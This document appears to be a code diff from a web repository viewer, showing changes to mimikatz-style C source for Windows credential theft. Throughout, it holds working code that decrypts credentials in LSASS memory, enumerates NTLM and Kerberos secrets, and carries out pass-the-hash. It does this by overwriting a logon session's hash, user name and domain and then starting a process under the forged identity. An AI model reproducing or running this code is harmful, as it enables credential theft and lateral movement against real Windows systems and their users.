typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
|
||||
DWORD unk0; // dword_1233EC8 dd 4
|
||||
DWORD cbItem; // debug048:01233ECC dd 5
|
||||
PVOID unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PVOID unk4;
|
||||
//KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
|
||||
} KIWI_KERBEROS_KEYS_LIST_6, *PKIWI_KERBEROS_KEYS_LIST_6;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_ENUM_DATA_TICKET {
|
||||
BOOL isTicketExport;
|
||||
BOOL isFullTicket;
|
||||
} KIWI_KERBEROS_ENUM_DATA_TICKET, *PKIWI_KERBEROS_ENUM_DATA_TICKET;
|
||||
@ -24,14 +24,12 @@ LONG kuhl_m_sekurlsa_msv_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state)
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
MSV1_0_STD_DATA stdData = {pData->LogonId, externalCallback, externalCallbackData};
|
||||
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, &stdData);
|
||||
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, pData->LogonId);
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
DWORD flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL;
|
||||
PMSV1_0_STD_DATA stdData = (PMSV1_0_STD_DATA) pOptionalData;
|
||||
|
||||
kprintf(L"\n\t [%08x] %Z", AuthenticationPackageId, &pCredentials->Primary);
|
||||
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
@ -39,28 +37,32 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY
|
||||
else if(RtlEqualString(&pCredentials->Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, stdData->LogonId, flags, stdData->externalCallback, stdData->externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, (PLUID) pOptionalData, flags, NULL, NULL);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) (pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED) pOptionalData;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {pPrimaryCreds, &hLocalMemory};
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL)(pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED)pOptionalData;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { pPrimaryCreds, &hLocalMemory };
|
||||
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->UserName.Buffer, pthDataCred->pthData->UserName, pPrimaryCreds->UserName.Length);
|
||||
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
if (RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
{
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->UserName.Buffer, pthDataCred->pthData->UserName, pPrimaryCreds->UserName.Length);
|
||||
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
|
||||
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
|
||||
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !\n");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
|
||||
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
else kprintf(L".");
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
@ -80,73 +82,74 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[])
|
||||
{
|
||||
BYTE ntlm[LM_NTLM_HASH_LENGTH] = {0};
|
||||
BYTE ntlm[LM_NTLM_HASH_LENGTH] = { 0 };
|
||||
TOKEN_STATISTICS tokenStats;
|
||||
MSV1_0_PTH_DATA data = {&(tokenStats.AuthenticationId), NULL, NULL, ntlm, FALSE};
|
||||
PCWCHAR szRun, szNTLM, pFakeUserName, pFakeLogonDomain;
|
||||
MSV1_0_PTH_DATA data = { &(tokenStats.AuthenticationId), NULL, NULL, ntlm, FALSE };
|
||||
PCWCHAR szRun, szNTLM;
|
||||
DWORD i, j, dwNeededSize;
|
||||
HANDLE hToken;
|
||||
PROCESS_INFORMATION processInfos;
|
||||
|
||||
if(pFakeUserName = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"user", &data.UserName))
|
||||
if (kull_m_string_args_byName(argc, argv, L"user", &data.UserName, NULL))
|
||||
{
|
||||
if(pFakeLogonDomain = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"domain", &data.LogonDomain))
|
||||
if (kull_m_string_args_byName(argc, argv, L"domain", &data.LogonDomain, NULL))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"ntlm", &szNTLM, NULL))
|
||||
if (kull_m_string_args_byName(argc, argv, L"ntlm", &szNTLM, NULL))
|
||||
{
|
||||
kull_m_string_args_byName(argc, argv, L"run", &szRun, L"cmd.exe");
|
||||
if(wcslen(szNTLM) == (LM_NTLM_HASH_LENGTH * 2))
|
||||
if (wcslen(szNTLM) == (LM_NTLM_HASH_LENGTH * 2))
|
||||
{
|
||||
for(i = 0; i < LM_NTLM_HASH_LENGTH; i++)
|
||||
for (i = 0; i < LM_NTLM_HASH_LENGTH; i++)
|
||||
{
|
||||
swscanf_s(&szNTLM[i*2], L"%02x", &j);
|
||||
ntlm[i] = (BYTE) j;
|
||||
swscanf_s(&szNTLM[i * 2], L"%02x", &j);
|
||||
ntlm[i] = (BYTE)j;
|
||||
}
|
||||
kprintf(L"NTLM\t: "); kull_m_string_wprintf_hex(data.NtlmHash, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
|
||||
kprintf(L"Program\t: %s\n", szRun);
|
||||
if(kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, pFakeUserName, pFakeLogonDomain, L"", &processInfos, FALSE))
|
||||
if (kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, data.UserName, data.LogonDomain, L"", &processInfos, FALSE))
|
||||
{
|
||||
kprintf(
|
||||
L" | PID %u\n"
|
||||
L" | TID %u\n",
|
||||
L" | PID %u\n"
|
||||
L" | TID %u\n",
|
||||
processInfos.dwProcessId, processInfos.dwThreadId);
|
||||
if(OpenProcessToken(processInfos.hProcess, TOKEN_READ, &hToken))
|
||||
if (OpenProcessToken(processInfos.hProcess, TOKEN_READ, &hToken))
|
||||
{
|
||||
if(GetTokenInformation(hToken, TokenStatistics, &tokenStats, sizeof(tokenStats), &dwNeededSize))
|
||||
if (GetTokenInformation(hToken, TokenStatistics, &tokenStats, sizeof(tokenStats), &dwNeededSize))
|
||||
{
|
||||
kprintf(L" | LUID %u ; %u (%08x:%08x)\n", tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart, tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart);
|
||||
kprintf(L" \\_ ");
|
||||
kprintf(L" | LUID %u ; %u (%08x:%08x)\n", tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart, tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart);
|
||||
kprintf(L" \\_ ");
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_msv_pth, &data);
|
||||
} else PRINT_ERROR_AUTO(L"GetTokenInformation");
|
||||
kprintf(L"\n");
|
||||
if (data.isReplaceOk)
|
||||
{
|
||||
kprintf(L" \\_ ");
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_pth, &data);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"GetTokenInformation");
|
||||
CloseHandle(hToken);
|
||||
} else PRINT_ERROR_AUTO(L"OpenProcessToken");
|
||||
NtResumeProcess(processInfos.hProcess);
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"OpenProcessToken");
|
||||
|
||||
if (data.isReplaceOk)
|
||||
NtResumeProcess(processInfos.hProcess);
|
||||
else
|
||||
NtTerminateProcess(processInfos.hProcess, STATUS_FATAL_APP_EXIT);
|
||||
|
||||
CloseHandle(processInfos.hThread);
|
||||
CloseHandle(processInfos.hProcess);
|
||||
} else PRINT_ERROR_AUTO(L"CreateProcessWithLogonW");
|
||||
} else PRINT_ERROR(L"ntlm hash length must be 32 (16 bytes)\n");
|
||||
} else PRINT_ERROR(L"Missing argument : ntlm\n");
|
||||
LocalFree((HLOCAL) pFakeLogonDomain);
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"CreateProcessWithLogonW");
|
||||
}
|
||||
else PRINT_ERROR(L"ntlm hash length must be 32 (16 bytes)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Missing argument : ntlm\n");
|
||||
}
|
||||
LocalFree((HLOCAL) pFakeUserName);
|
||||
}
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
PWCHAR kuhl_m_sekurlsa_msv_pth_makefakestring(const int argc, const wchar_t * argv[], const wchar_t * name, const wchar_t ** theArgs)
|
||||
{
|
||||
PWCHAR ret = NULL;
|
||||
SIZE_T len;
|
||||
if(kull_m_string_args_byName(argc, argv, name, theArgs, NULL))
|
||||
{
|
||||
kprintf(L"%s\t: %s\n", name, *theArgs);
|
||||
len = wcslen(*theArgs);
|
||||
if(ret = (PWCHAR) LocalAlloc(LPTR, (len + 1) * sizeof(wchar_t)))
|
||||
wmemset(ret, L'-', len);
|
||||
} else PRINT_ERROR(L"Missing argument : %s\n", name);
|
||||
return ret;
|
||||
}
|
||||
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData)
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
|
||||
@ -65,5 +65,3 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
PWCHAR kuhl_m_sekurlsa_msv_pth_makefakestring(const int argc, const wchar_t * argv[], const wchar_t * name, const wchar_t ** theArgs);
|
||||
|
||||
@ -45,6 +45,24 @@ typedef struct _CRYPTO_BUFFER {
|
||||
} CRYPTO_BUFFER, *PCRYPTO_BUFFER;
|
||||
typedef CONST CRYPTO_BUFFER *PCCRYPTO_BUFFER;
|
||||
|
||||
|
||||
typedef struct _KERB_HASHPASSWORD_GENERIC {
|
||||
DWORD Type;
|
||||
SIZE_T Size;
|
||||
PBYTE Checksump;
|
||||
} KERB_HASHPASSWORD_GENERIC, *PKERB_HASHPASSWORD_GENERIC;
|
||||
|
||||
typedef struct _KERB_HASHPASSWORD_5 {
|
||||
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
|
||||
KERB_HASHPASSWORD_GENERIC generic;
|
||||
} KERB_HASHPASSWORD_5, *PKERB_HASHPASSWORD_5;
|
||||
|
||||
typedef struct _KERB_HASHPASSWORD_6 {
|
||||
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
|
||||
PVOID stringToKey;
|
||||
KERB_HASHPASSWORD_GENERIC generic;
|
||||
} KERB_HASHPASSWORD_6, *PKERB_HASHPASSWORD_6;
|
||||
|
||||
extern VOID WINAPI MD4Init(PMD4_CTX pCtx);
|
||||
extern VOID WINAPI MD4Update(PMD4_CTX pCtx, LPCVOID data, DWORD cbData);
|
||||
extern VOID WINAPI MD4Final(PMD4_CTX pCtx);
|
||||
|
||||
Loading…
Reference in New Issue
Block a user